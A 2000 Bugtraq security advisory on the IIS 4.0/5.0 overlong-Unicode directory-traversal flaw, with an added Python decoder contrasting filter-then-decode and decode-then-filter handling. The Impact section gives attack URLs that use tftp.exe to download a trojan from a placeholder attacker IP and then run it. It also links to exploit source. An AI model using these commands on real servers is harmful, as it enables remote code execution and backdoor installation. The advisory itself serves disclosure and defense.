From zoachien@SECURAX.ORG Tue Oct 24 10:16:02 2000
From: Zoa_Chien
X-Sender: zoachien@www.securax.org
To: BUGTRAQ@SECURITYFOCUS.COM
Date: Tue, 24 Oct 2000 11:16:46 +0200
Subject: [BUGTRAQ] exploiting IIS unicode bug using tftp.exe and samba

=====================================================================
Securax-SA-06                                      Security Advisory
                                belgian.networking.security Dutch
=====================================================================
Topic:          Ms Windows IIS 4.0 - 5.0 allows executing commands and
                uploading files using TFTP and SAMBA.
Announced:      2000-10-23
Updated:        2000-10-24
Affects:        IIS 4.0, 5.0
None affected:  Apache, IIS 3.0
Obsoletes:      /
=====================================================================

THE ENTIRE ADVISORY HAS BEEN BASED UPON TRIAL AND ERROR RESULTS.
THEREFORE WE CANNOT ENSURE YOU THE INFORMATION BELOW IS 100% CORRECT.
THIS DOCUMENT IS SUBJECT TO CHANGE WITHOUT PRIOR NOTICE. PLEASE, IF
YOU HAPPEN TO FIND MORE INFORMATION CONCERNING THE BUG DISCUSSED IN
THIS ADVISORY, PLEASE SHARE THIS ON BUGTRAQ. THANK YOU.

I. Background

As mentioned in other advisories, remote users can execute any command on several IIS 4.0 and 5.0 systems by using overlong Unicode (UTF-8) representations of ../

What are these overlong representations? The UTF-8 encoding of Unicode v2.0 allows multiple byte sequences for each character, for instance:

2f
c0 af
e0 80 af
f0 80 80 af
f8 80 80 80 af
fc 80 80 80 80 af
...

are all possible representations of "/". A good decoder should reject every representation that is longer than the shortest possible one, precisely to avoid this kind of filtering problem. This is where things go wrong in IIS 4.0 and 5.0: IIS first scans the given URL for ../ and ..\ and for the normal (shortest) encoding of these strings; if those are found, the request is rejected, and only if they are not found is the string decoded and interpreted.
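As an added example (not code from the advisory), the decoder below rejects overlong UTF-8 forms and contrasts the filter-before-decode order described above with a decode-then-filter order; the /scripts/ sample URL in the usage is constructed for the demonstration.

```python
from urllib.parse import unquote_to_bytes
# Smallest code point a sequence of n bytes may legitimately encode (index = n).
MINIMUM = (0, 0, 0x80, 0x800, 0x10000, 0x200000, 0x4000000)

def decode_utf8(data: bytes, strict: bool = True) -> str:
    """Added example, not the advisory's code. strict=True enforces shortest
    form; strict=False accepts overlong forms such as c0 af for '/'."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:            n, cp = 1, b
        elif 0xC0 <= b <= 0xDF: n, cp = 2, b & 0x1F
        elif 0xE0 <= b <= 0xEF: n, cp = 3, b & 0x0F
        elif 0xF0 <= b <= 0xF7: n, cp = 4, b & 0x07
        elif 0xF8 <= b <= 0xFB: n, cp = 5, b & 0x03  # 5/6-byte forms from the
        elif 0xFC <= b <= 0xFD: n, cp = 6, b & 0x01  # original UTF-8 definition
        else: raise ValueError(f"invalid lead byte {b:#04x} at offset {i}")
        if i + n > len(data): raise ValueError(f"truncated sequence at offset {i}")
        for k in range(1, n):
            if data[i + k] & 0xC0 != 0x80: raise ValueError(f"bad continuation at {i + k}")
            cp = (cp << 6) | (data[i + k] & 0x3F)
        if strict and (n > 4 or cp < MINIMUM[n] or cp > 0x10FFFF
                       or 0xD800 <= cp <= 0xDFFF):
            raise ValueError(f"overlong or out-of-range sequence at offset {i}")
        out.append(chr(cp))
        i += n
    return "".join(out)

def escapes_root(path: str) -> bool:
    """True if the path climbs above its root once '..' segments are resolved."""
    depth = 0
    for seg in path.replace("\\", "/").split("/"):
        depth += -1 if seg == ".." else int(seg not in ("", "."))
        if depth < 0:
            return True
    return False

def filter_then_decode(raw: bytes):
    """Order the advisory attributes to IIS: check the still-encoded path,
    then decode leniently. Returns the decoded path, or None if rejected."""
    if escapes_root(raw.decode("latin-1")):
        return None
    return decode_utf8(unquote_to_bytes(raw), strict=False)

def decode_then_filter(raw: bytes):
    """Hardened order: strict decode (overlong forms rejected), then check."""
    try:
        path = decode_utf8(unquote_to_bytes(raw), strict=True)
    except ValueError:
        return None
    return None if escapes_root(path) else path
```

With the constructed request b"/scripts/..%c0%af../winnt/system32/tftp.exe", filter_then_decode lets a path through that resolves above the web root, while decode_then_filter rejects the overlong byte pair before any path check runs.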
That IIS filters first and decodes afterwards can be derived from the differences between error.log and access.log when encoded URLs are handled. Since the filter does NOT check for the huge number of overlong representations of ../ and ..\, the filter is bypassed and the directory traversal routine is invoked.

Until now, only servers that have the /wwwroot/ dir on the same partition as the WINNT dir seem to be vulnerable. (Although we noticed that, for some reason, if an inactive /Inetpub/wwwroot/ exists on the C: drive, you will be able to run commands even if the active wwwroot is on the D: drive.)

Exploiting this bug is quite easy, but using pipes and redirects (> | <) always causes a 500 server error. Without these characters we cannot use interactive standard NT executables like ftp or telnet (for instance ftp.exe < script), and we cannot create files with custom contents by using echo "blah blah" > filename. Thus we are limited to viewing, deleting and copying files, not changing the contents of files or running our very own trojan.

II. Problem Description

Anonymous, remote (IUSR_xxxxx) users can view, copy, delete, md and issue other non-ACL-protected commands from their browser windows. The possibilities even include uploading trojans and other hostile code, viewing .asp files, ...

III. Impact

By using tftp.exe, which comes with NT and Win2k, to connect to a TFTP daemon and download a trojan, you can bypass these restrictions. Install < ftp://ftp.cavebear.com/karl/tftpd32.zip > and connect from the compromised machine to your local machine using the command "tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe". You can do so with this URL:

/[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"-i"+xxx.xxx.xxx.xxx+GET+ncx99.exe+c:\winnt\system32\ncx99.exe

Then all you have to do is run the trojan with:

/[bin-dir]/..%c0%af../winnt/system32/ncx99.exe

You might also use the Samba commands "net share" and "net user" on the target and "net use" on the local machine...
but this does not always seem to work. (Because NetBIOS is not installed?)

IV. Solution

This *should* get patched ASAP, since a lot of servers seem to be vulnerable. The possibilities of this exploit are bigger than meets the eye, and we all had our share of warnings when the msadc exploded in our faces. This vulnerability is serious, so patch this as soon as possible.

V. Credits

UNICODE decoding flaw posted to the packetstorm forum by an unknown author.
for the Samba tryout and writeup for the TFTP.

VI. Source code

http://www.unixandbeer.com/reggie/IIS4-5.exe
http://packetstorm.securify.com/0010-exploits/iisex.c

Recommended reading (unicode):

http://www.unicode.org/charts/PDF/
http://home.sch.bme.hu/~kisza/secure-programs/x401.html
http://www.cl.cam.ac.uk/~mgk25/unicode.html